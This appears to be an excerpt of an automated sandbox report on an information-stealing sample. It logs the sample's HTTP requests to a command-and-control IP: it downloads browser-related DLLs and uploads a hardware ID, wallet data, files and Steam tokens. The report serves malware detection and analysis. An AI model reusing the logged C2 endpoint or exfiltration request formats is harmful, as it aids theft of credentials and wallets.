6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 47 44 47 43 47 44 41 4b 45 42 46 49 4a 45 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 47 44 47 43 47 44 41 4b 45 42 46 49 4a 45 43 47 2d 2d 0d 0a Data Ascii: ------AKKEGDGCGDAKEBFIJECGContent-Disposition: form-data; name="token"c34c4686df54526fe50e450667052aa4ea0bf35bbf0aa63153f4cc05f6dc9542843e0ee2------AKKEGDGCGDAKEBFIJECGContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------AKKEGDGCGDAKEBFIJECGContent-Disposition: form-data; name="file"------AKKEGDGCGDAKEBFIJECG--
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/freebl3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/mozglue.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/msvcp140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/nss3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/softokn3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJEBKJDAFHJDGDHJKKEGHost: 185.215.113.37Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIJJKECFCFBGDHIECAAFHost: 185.215.113.37Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 4a 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 33 34 63 34 36 38 36 64 66 35 34 35 32 36 66 65 35 30 65 34 35 30 36 36 37 30 35 32 61 61 34 65 61 30 62 66 33 35 62 62 66 30 61 61 36 33 31 35 33 66 34 63 63 30 35 66 36 64 63 39 35 34 32 38 34 33 65 30 65 65 32 0d 0a 2d 2d 2d 2d 2d 2d 46 49 4a 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 46 49 4a 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 2d 2d 0d 0a Data Ascii: ------FIJJKECFCFBGDHIECAAFContent-Disposition: form-data; name="token"c34c4686df54526fe50e450667052aa4ea0bf35bbf0aa63153f4cc05f6dc9542843e0ee2------FIJJKECFCFBGDHIECAAFContent-Disposition: form-data; name="message"wallets------FIJJKECFCFBGDHIECAAF--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGDGDHJJDGHCAAAKEHIJHost: 185.215.113.37Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 44 47 44 48 4a 4a 44 47 48 43 41 41 41 4b 45 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 33 34 63 34 36 38 36 64 66 35 34 35 32 36 66 65 35 30 65 34 35 30 36 36 37 30 35 32 61 61 34 65 61 30 62 66 33 35 62 62 66 30 61 61 36 33 31 35 33 66 34 63 63 30 35 66 36 64 63 39 35 34 32 38 34 33 65 30 65 65 32 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 47 44 48 4a 4a 44 47 48 43 41 41 41 4b 45 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 47 44 48 4a 4a 44 47 48 43 41 41 41 4b 45 48 49 4a 2d 2d 0d 0a Data Ascii: ------EGDGDHJJDGHCAAAKEHIJContent-Disposition: form-data; name="token"c34c4686df54526fe50e450667052aa4ea0bf35bbf0aa63153f4cc05f6dc9542843e0ee2------EGDGDHJJDGHCAAAKEHIJContent-Disposition: form-data; name="message"files------EGDGDHJJDGHCAAAKEHIJ--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIJEBFCFIJJJEBGDBAKEHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 46 43 46 49 4a 4a 4a 45 42 47 44 42 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 33 34 63 34 36 38 36 64 66 35 34 35 32 36 66 65 35 30 65 34 35 30 36 36 37 30 35 32 61 61 34 65 61 30 62 66 33 35 62 62 66 30 61 61 36 33 31 35 33 66 34 63 63 30 35 66 36 64 63 39 35 34 32 38 34 33 65 30 65 65 32 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 46 43 46 49 4a 4a 4a 45 42 47 44 42 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 46 43 46 49 4a 4a 4a 45 42 47 44 42 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 46 43 46 49 4a 4a 4a 45 42 47 44 42 41 4b 45 2d 2d 0d 0a Data Ascii: ------IIJEBFCFIJJJEBGDBAKEContent-Disposition: form-data; name="token"c34c4686df54526fe50e450667052aa4ea0bf35bbf0aa63153f4cc05f6dc9542843e0ee2------IIJEBFCFIJJJEBGDBAKEContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------IIJEBFCFIJJJEBGDBAKEContent-Disposition: form-data; name="file"------IIJEBFCFIJJJEBGDBAKE--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBFBFBFIIJDAKECAKKJEHost: 185.215.113.37Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 46 42 46 42 46 49 49 4a 44 41 4b 45 43 41 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 33 34 63 34 36 38 36 64 66 35 34 35 32 36 66 65 35 30 65 34 35 30 36 36 37 30 35 32 61 61 34 65 61 30 62 66 33 35 62 62 66 30 61 61 36 33 31 35 33 66 34 63 63 30 35 66 36 64 63 39 35 34 32 38 34 33 65 30 65 65 32 0d 0a 2d 2d 2d 2d 2d 2d 45 42 46 42 46 42 46 49 49 4a 44 41 4b 45 43 41 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 45 42 46 42 46 42 46 49 49 4a 44 41 4b 45 43 41 4b 4b 4a 45 2d 2d 0d 0a Data Ascii: ------EBFBFBFIIJDAKECAKKJEContent-Disposition: form-data; name="token"c34c4686df54526fe50e450667052aa4ea0bf35bbf0aa63153f4cc05f6dc9542843e0ee2------EBFBFBFIIJDAKECAKKJEContent-Disposition: form-data; name="message"ybncbhylepme------EBFBFBFIIJDAKECAKKJE--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDBAKKKFBGDHJKFHJJJJHost: 185.215.113.37Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 42 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 4a 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 33 34 63 34 36 38 36 64 66 35 34 35 32 36 66 65 35 30 65 34 35 30 36 36 37 30 35 32 61 61 34 65 61 30 62 66 33 35 62 62 66 30 61 61 36 33 31 35 33 66 34 63 63 30 35 66 36 64 63 39 35 34 32 38 34 33 65 30 65 65 32 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 4a 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 4a 4a 4a 2d 2d 0d 0a Data Ascii: ------GDBAKKKFBGDHJKFHJJJJContent-Disposition: form-data; name="token"c34c4686df54526fe50e450667052aa4ea0bf35bbf0aa63153f4cc05f6dc9542843e0ee2------GDBAKKKFBGDHJKFHJJJJContent-Disposition: form-data; name="message"wkkjqaiaxkhb------GDBAKKKFBGDHJKFHJJJJ--

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 185.215.113.37 185.215.113.37

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Suricata IDS alerts with low severity for network traffic

Source: Network traffic

Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49704 -> 185.215.113.37:80

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_005E4880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

0_2_005E4880

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/sqlite3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/freebl3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/mozglue.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/msvcp140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/nss3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/softokn3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache

Source: unknown

HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IECGIEBAEBFIIECBGCBGHost: 185.215.113.37Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 43 47 49 45 42 41 45 42 46 49 49 45 43 42 47 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 44 43 37 31 39 41 34 31 30 42 42 38 38 33 38 38 34 31 37 39 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 47 49 45 42 41 45 42 46 49 49 45 43 42 47 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 47 49 45 42 41 45 42 46 49 49 45 43 42 47 43 42 47 2d 2d 0d 0a Data Ascii: ------IECGIEBAEBFIIECBGCBGContent-Disposition: form-data; name="hwid"FDC719A410BB883884179------IECGIEBAEBFIIECBGCBGContent-Disposition: form-data; name="build"doma------IECGIEBAEBFIIECBGCBG--

Source: file.exe, 00000000.00000002.2364033932.00000000007AB000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2365609973.00000000013EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.2365609973.0000000001449000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.2365609973.0000000001449000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/freebl3.dll
Source: file.exe, 00000000.00000002.2365609973.0000000001449000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/mozglue.dll
Source: file.exe, 00000000.00000002.2365609973.0000000001449000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/msvcp140.dll
Source: file.exe, 00000000.00000002.2365609973.0000000001449000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/msvcp140.dlld
Source: file.exe, 00000000.00000002.2365609973.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2365609973.000000000147F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dll
Source: file.exe, 00000000.00000002.2365609973.0000000001449000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dll3
Source: file.exe, 00000000.00000002.2365609973.0000000001449000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dllt
Source: file.exe, 00000000.00000002.2365609973.0000000001449000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/softokn3.dll
Source: file.exe, 00000000.00000002.2365609973.0000000001449000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/softokn3.dllH
Source: file.exe, 00000000.00000002.2365609973.0000000001449000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/sqlite3.dll
Source: file.exe, 00000000.00000002.2365609973.0000000001449000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/vcruntime140.dll
Source: file.exe, 00000000.00000002.2365609973.0000000001449000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/vcruntime140.dlll
Source: file.exe, 00000000.00000002.2365609973.000000000147F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.2365609973.000000000147F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php3
Source: file.exe, 00000000.00000002.2365609973.000000000147F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php5.c
Source: file.exe, 00000000.00000002.2365609973.0000000001449000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php6
Source: file.exe, 00000000.00000002.2365609973.0000000001449000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpE
Source: file.exe, 00000000.00000002.2365609973.000000000147F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpHAR)
Source: file.exe, 00000000.00000002.2365609973.0000000001449000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpN
Source: file.exe, 00000000.00000002.2365609973.0000000001449000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpR
Source: file.exe, 00000000.00000002.2365609973.0000000001433000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpb
Source: file.exe, 00000000.00000002.2365609973.000000000147F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpf
Source: file.exe, 00000000.00000002.2365609973.000000000147F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpq
Source: file.exe, 00000000.00000002.2364033932.00000000007AB000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phption:
Source: file.exe, 00000000.00000002.2365609973.0000000001465000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpwser
Source: file.exe, 00000000.00000002.2365609973.0000000001449000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/s
Source: file.exe, 00000000.00000002.2365609973.00000000013EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37R
Source: file.exe, 00000000.00000002.2364033932.00000000007AB000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.37e2b1563c6670f193.phption:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, file.exe, 00000000.00000002.2392162329.000000006C6CD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
